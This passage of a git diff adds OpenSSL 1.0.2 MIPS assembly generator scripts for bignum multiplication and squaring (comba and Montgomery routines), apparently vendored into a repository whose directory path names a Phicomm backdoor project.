+	$MULTU	$a_4,$b_7		# mul_add_c(a[4],b[7],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,10*$BNSZ($a0)	# r[10]=c2;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_5,$b_6		# mul_add_c(a[5],b[6],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$c_2,$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_6,$b_5		# mul_add_c(a[6],b[5],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_7,$b_4		# mul_add_c(a[7],b[4],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_7,$b_5		# mul_add_c(a[7],b[5],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,11*$BNSZ($a0)	# r[11]=c3;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_6,$b_6		# mul_add_c(a[6],b[6],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$c_3,$c_2,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_5,$b_7		# mul_add_c(a[5],b[7],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	 $MULTU	$a_6,$b_7		# mul_add_c(a[6],b[7],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	$ST	$c_1,12*$BNSZ($a0)	# r[12]=c1;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_7,$b_6		# mul_add_c(a[7],b[6],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$c_1,$c_3,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_7,$b_7		# mul_add_c(a[7],b[7],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,13*$BNSZ($a0)	# r[13]=c2;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	$ST	$c_3,14*$BNSZ($a0)	# r[14]=c3;
+	$ST	$c_1,15*$BNSZ($a0)	# r[15]=c1;
+
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$s5,10*$SZREG($sp)
+	$REG_L	$s4,9*$SZREG($sp)
+	$REG_L	$s3,8*$SZREG($sp)
+	$REG_L	$s2,7*$SZREG($sp)
+	$REG_L	$s1,6*$SZREG($sp)
+	$REG_L	$s0,5*$SZREG($sp)
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	jr	$ra
+	$PTR_ADD $sp,12*$SZREG
+___
+$code.=<<___ if ($flavour !~ /nubi/i);
+	$REG_L	$s5,5*$SZREG($sp)
+	$REG_L	$s4,4*$SZREG($sp)
+	$REG_L	$s3,3*$SZREG($sp)
+	$REG_L	$s2,2*$SZREG($sp)
+	$REG_L	$s1,1*$SZREG($sp)
+	$REG_L	$s0,0*$SZREG($sp)
+	jr	$ra
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+.end	bn_mul_comba8
+
+.align	5
+.globl	bn_mul_comba4
+.ent	bn_mul_comba4
+bn_mul_comba4:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	$LD	$a_0,0($a1)
+	$LD	$b_0,0($a2)
+	$LD	$a_1,$BNSZ($a1)
+	$LD	$a_2,2*$BNSZ($a1)
+	$MULTU	$a_0,$b_0		# mul_add_c(a[0],b[0],c1,c2,c3);
+	$LD	$a_3,3*$BNSZ($a1)
+	$LD	$b_1,$BNSZ($a2)
+	$LD	$b_2,2*$BNSZ($a2)
+	$LD	$b_3,3*$BNSZ($a2)
+	mflo	$c_1
+	mfhi	$c_2
+	$ST	$c_1,0($a0)
+
+	$MULTU	$a_0,$b_1		# mul_add_c(a[0],b[1],c2,c3,c1);
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_1,$b_0		# mul_add_c(a[1],b[0],c2,c3,c1);
+	$ADDU	$c_3,$t_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_2,$b_0		# mul_add_c(a[2],b[0],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$c_1,$c_3,$t_2
+	$ST	$c_2,$BNSZ($a0)
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_1,$b_1		# mul_add_c(a[1],b[1],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_0,$b_2		# mul_add_c(a[0],b[2],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$c_2,$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_0,$b_3		# mul_add_c(a[0],b[3],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,2*$BNSZ($a0)
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_1,$b_2		# mul_add_c(a[1],b[2],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$c_3,$c_2,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_2,$b_1		# mul_add_c(a[2],b[1],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_3,$b_0		# mul_add_c(a[3],b[0],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	 $MULTU	$a_3,$b_1		# mul_add_c(a[3],b[1],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	$ST	$c_1,3*$BNSZ($a0)
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_2,$b_2		# mul_add_c(a[2],b[2],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$c_1,$c_3,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_1,$b_3		# mul_add_c(a[1],b[3],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_2,$b_3		# mul_add_c(a[2],b[3],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,4*$BNSZ($a0)
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_3,$b_2		# mul_add_c(a[3],b[2],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$c_2,$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_3,$b_3		# mul_add_c(a[3],b[3],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,5*$BNSZ($a0)
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	$ST	$c_1,6*$BNSZ($a0)
+	$ST	$c_2,7*$BNSZ($a0)
+
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	nop
+.end	bn_mul_comba4
+___
+
+($a_4,$a_5,$a_6,$a_7)=($b_0,$b_1,$b_2,$b_3);
+
+sub add_c2 () {
+my ($hi,$lo,$c0,$c1,$c2,
+    $warm,      # !$warm denotes first call with specific sequence of
+                # $c_[XYZ] when there is no Z-carry to accumulate yet;
+    $an,$bn     # these two are arguments for multiplication which
+                # result is used in *next* step [which is why it's
+                # commented as "forward multiplication" below];
+    )=@_;
+$code.=<<___;
+	mflo	$lo
+	mfhi	$hi
+	$ADDU	$c0,$lo
+	sltu	$at,$c0,$lo
+	 $MULTU	$an,$bn			# forward multiplication
+	$ADDU	$c0,$lo
+	$ADDU	$at,$hi
+	sltu	$lo,$c0,$lo
+	$ADDU	$c1,$at
+	$ADDU	$hi,$lo
+___
+$code.=<<___	if (!$warm);
+	sltu	$c2,$c1,$at
+	$ADDU	$c1,$hi
+	sltu	$hi,$c1,$hi
+	$ADDU	$c2,$hi
+___
+$code.=<<___	if ($warm);
+	sltu	$at,$c1,$at
+	$ADDU	$c1,$hi
+	$ADDU	$c2,$at
+	sltu	$hi,$c1,$hi
+	$ADDU	$c2,$hi
+___
+}
+
+$code.=<<___;
+
+.align	5
+.globl	bn_sqr_comba8
+.ent	bn_sqr_comba8
+bn_sqr_comba8:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	$LD	$a_0,0($a1)
+	$LD	$a_1,$BNSZ($a1)
+	$LD	$a_2,2*$BNSZ($a1)
+	$LD	$a_3,3*$BNSZ($a1)
+
+	$MULTU	$a_0,$a_0		# mul_add_c(a[0],b[0],c1,c2,c3);
+	$LD	$a_4,4*$BNSZ($a1)
+	$LD	$a_5,5*$BNSZ($a1)
+	$LD	$a_6,6*$BNSZ($a1)
+	$LD	$a_7,7*$BNSZ($a1)
+	mflo	$c_1
+	mfhi	$c_2
+	$ST	$c_1,0($a0)
+
+	$MULTU	$a_0,$a_1		# mul_add_c2(a[0],b[1],c2,c3,c1);
+	mflo	$t_1
+	mfhi	$t_2
+	slt	$c_1,$t_2,$zero
+	$SLL	$t_2,1
+	 $MULTU	$a_2,$a_0		# mul_add_c2(a[2],b[0],c3,c1,c2);
+	slt	$a2,$t_1,$zero
+	$ADDU	$t_2,$a2
+	$SLL	$t_1,1
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$ADDU	$c_3,$t_2,$at
+	$ST	$c_2,$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,0,
+		$a_1,$a_1);		# mul_add_c(a[1],b[1],c3,c1,c2);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_0,$a_3		# mul_add_c2(a[0],b[3],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,2*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,0,
+		$a_1,$a_2);		# mul_add_c2(a[1],b[2],c1,c2,c3);
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,1,
+		$a_4,$a_0);		# mul_add_c2(a[4],b[0],c2,c3,c1);
+$code.=<<___;
+	$ST	$c_1,3*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,0,
+		$a_3,$a_1);		# mul_add_c2(a[3],b[1],c2,c3,c1);
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,1,
+		$a_2,$a_2);		# mul_add_c(a[2],b[2],c2,c3,c1);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_0,$a_5		# mul_add_c2(a[0],b[5],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,4*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,0,
+		$a_1,$a_4);		# mul_add_c2(a[1],b[4],c3,c1,c2);
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,1,
+		$a_2,$a_3);		# mul_add_c2(a[2],b[3],c3,c1,c2);
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,1,
+		$a_6,$a_0);		# mul_add_c2(a[6],b[0],c1,c2,c3);
+$code.=<<___;
+	$ST	$c_3,5*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,0,
+		$a_5,$a_1);		# mul_add_c2(a[5],b[1],c1,c2,c3);
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,1,
+		$a_4,$a_2);		# mul_add_c2(a[4],b[2],c1,c2,c3);
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,1,
+		$a_3,$a_3);		# mul_add_c(a[3],b[3],c1,c2,c3);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	 $MULTU	$a_0,$a_7		# mul_add_c2(a[0],b[7],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	$ST	$c_1,6*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,0,
+		$a_1,$a_6);		# mul_add_c2(a[1],b[6],c2,c3,c1);
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,1,
+		$a_2,$a_5);		# mul_add_c2(a[2],b[5],c2,c3,c1);
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,1,
+		$a_3,$a_4);		# mul_add_c2(a[3],b[4],c2,c3,c1);
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,1,
+		$a_7,$a_1);		# mul_add_c2(a[7],b[1],c3,c1,c2);
+$code.=<<___;
+	$ST	$c_2,7*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,0,
+		$a_6,$a_2);		# mul_add_c2(a[6],b[2],c3,c1,c2);
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,1,
+		$a_5,$a_3);		# mul_add_c2(a[5],b[3],c3,c1,c2);
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,1,
+		$a_4,$a_4);		# mul_add_c(a[4],b[4],c3,c1,c2);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_2,$a_7		# mul_add_c2(a[2],b[7],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,8*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,0,
+		$a_3,$a_6);		# mul_add_c2(a[3],b[6],c1,c2,c3);
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,1,
+		$a_4,$a_5);		# mul_add_c2(a[4],b[5],c1,c2,c3);
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,1,
+		$a_7,$a_3);		# mul_add_c2(a[7],b[3],c2,c3,c1);
+$code.=<<___;
+	$ST	$c_1,9*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,0,
+		$a_6,$a_4);		# mul_add_c2(a[6],b[4],c2,c3,c1);
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,1,
+		$a_5,$a_5);		# mul_add_c(a[5],b[5],c2,c3,c1);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_4,$a_7		# mul_add_c2(a[4],b[7],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,10*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,0,
+		$a_5,$a_6);		# mul_add_c2(a[5],b[6],c3,c1,c2);
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,1,
+		$a_7,$a_5);		# mul_add_c2(a[7],b[5],c1,c2,c3);
+$code.=<<___;
+	$ST	$c_3,11*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,0,
+		$a_6,$a_6);		# mul_add_c(a[6],b[6],c1,c2,c3);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	 $MULTU	$a_6,$a_7		# mul_add_c2(a[6],b[7],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	$ST	$c_1,12*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,0,
+		$a_7,$a_7);		# mul_add_c(a[7],b[7],c3,c1,c2);
+$code.=<<___;
+	$ST	$c_2,13*$BNSZ($a0)
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	$ST	$c_3,14*$BNSZ($a0)
+	$ST	$c_1,15*$BNSZ($a0)
+
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	nop
+.end	bn_sqr_comba8
+
+.align	5
+.globl	bn_sqr_comba4
+.ent	bn_sqr_comba4
+bn_sqr_comba4:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	$LD	$a_0,0($a1)
+	$LD	$a_1,$BNSZ($a1)
+	$MULTU	$a_0,$a_0		# mul_add_c(a[0],b[0],c1,c2,c3);
+	$LD	$a_2,2*$BNSZ($a1)
+	$LD	$a_3,3*$BNSZ($a1)
+	mflo	$c_1
+	mfhi	$c_2
+	$ST	$c_1,0($a0)
+
+	$MULTU	$a_0,$a_1		# mul_add_c2(a[0],b[1],c2,c3,c1);
+	mflo	$t_1
+	mfhi	$t_2
+	slt	$c_1,$t_2,$zero
+	$SLL	$t_2,1
+	 $MULTU	$a_2,$a_0		# mul_add_c2(a[2],b[0],c3,c1,c2);
+	slt	$a2,$t_1,$zero
+	$ADDU	$t_2,$a2
+	$SLL	$t_1,1
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$ADDU	$c_3,$t_2,$at
+	$ST	$c_2,$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,0,
+		$a_1,$a_1);		# mul_add_c(a[1],b[1],c3,c1,c2);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_0,$a_3		# mul_add_c2(a[0],b[3],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,2*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,0,
+		$a_1,$a_2);		# mul_add_c2(a2[1],b[2],c1,c2,c3);
+	&add_c2($t_2,$t_1,$c_1,$c_2,$c_3,1,
+		$a_3,$a_1);		# mul_add_c2(a[3],b[1],c2,c3,c1);
+$code.=<<___;
+	$ST	$c_1,3*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_2,$c_3,$c_1,0,
+		$a_2,$a_2);		# mul_add_c(a[2],b[2],c2,c3,c1);
+$code.=<<___;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_2,$a_3		# mul_add_c2(a[2],b[3],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,4*$BNSZ($a0)
+___
+	&add_c2($t_2,$t_1,$c_3,$c_1,$c_2,0,
+		$a_3,$a_3);		# mul_add_c(a[3],b[3],c1,c2,c3);
+$code.=<<___;
+	$ST	$c_3,5*$BNSZ($a0)
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	$ST	$c_1,6*$BNSZ($a0)
+	$ST	$c_2,7*$BNSZ($a0)
+
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	nop
+.end	bn_sqr_comba4
+___
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips3-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips3-mont.pl
new file mode 100644
index 0000000..8f9156e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips3-mont.pl
@@ -0,0 +1,327 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# This module doesn't present direct interest for OpenSSL, because it
+# doesn't provide better performance for longer keys. While 512-bit
+# RSA private key operations are 40% faster, 1024-bit ones are hardly
+# faster at all, while longer key operations are slower by up to 20%.
+# It might be of interest to embedded system developers though, as
+# it's smaller than 1KB, yet offers ~3x improvement over compiler
+# generated code.
+#
+# The module targets N32 and N64 MIPS ABIs and currently is a bit
+# IRIX-centric, i.e. is likely to require adaptation for other OSes.
+
+# int bn_mul_mont(
+$rp="a0";	# BN_ULONG *rp,
+$ap="a1";	# const BN_ULONG *ap,
+$bp="a2";	# const BN_ULONG *bp,
+$np="a3";	# const BN_ULONG *np,
+$n0="a4";	# const BN_ULONG *n0,
+$num="a5";	# int num);
+
+$lo0="a6";
+$hi0="a7";
+$lo1="v0";
+$hi1="v1";
+$aj="t0";
+$bi="t1";
+$nj="t2";
+$tp="t3";
+$alo="s0";
+$ahi="s1";
+$nlo="s2";
+$nhi="s3";
+$tj="s4";
+$i="s5";
+$j="s6";
+$fp="t8";
+$m1="t9";
+
+$FRAME=8*(2+8);
+
+$code=<<___;
+#include <asm.h>
+#include <regdef.h>
+
+.text
+
+.set	noat
+.set	reorder
+
+.align	5
+.globl	bn_mul_mont
+.ent	bn_mul_mont
+bn_mul_mont:
+	.set	noreorder
+	PTR_SUB	sp,64
+	move	$fp,sp
+	.frame	$fp,64,ra
+	slt	AT,$num,4
+	li	v0,0
+	beqzl	AT,.Lproceed
+	nop
+	jr	ra
+	PTR_ADD	sp,$fp,64
+	.set	reorder
+.align	5
+.Lproceed:
+	ld	$n0,0($n0)
+	ld	$bi,0($bp)	# bp[0]
+	ld	$aj,0($ap)	# ap[0]
+	ld	$nj,0($np)	# np[0]
+	PTR_SUB	sp,16		# place for two extra words
+	sll	$num,3
+	li	AT,-4096
+	PTR_SUB	sp,$num
+	and	sp,AT
+
+	sd	s0,0($fp)
+	sd	s1,8($fp)
+	sd	s2,16($fp)
+	sd	s3,24($fp)
+	sd	s4,32($fp)
+	sd	s5,40($fp)
+	sd	s6,48($fp)
+	sd	s7,56($fp)
+
+	dmultu	$aj,$bi
+	ld	$alo,8($ap)
+	ld	$nlo,8($np)
+	mflo	$lo0
+	mfhi	$hi0
+	dmultu	$lo0,$n0
+	mflo	$m1
+
+	dmultu	$alo,$bi
+	mflo	$alo
+	mfhi	$ahi
+
+	dmultu	$nj,$m1
+	mflo	$lo1
+	mfhi	$hi1
+	dmultu	$nlo,$m1
+	daddu	$lo1,$lo0
+	sltu	AT,$lo1,$lo0
+	daddu	$hi1,AT
+	mflo	$nlo
+	mfhi	$nhi
+
+	move	$tp,sp
+	li	$j,16
+.align	4
+.L1st:
+	.set	noreorder
+	PTR_ADD	$aj,$ap,$j
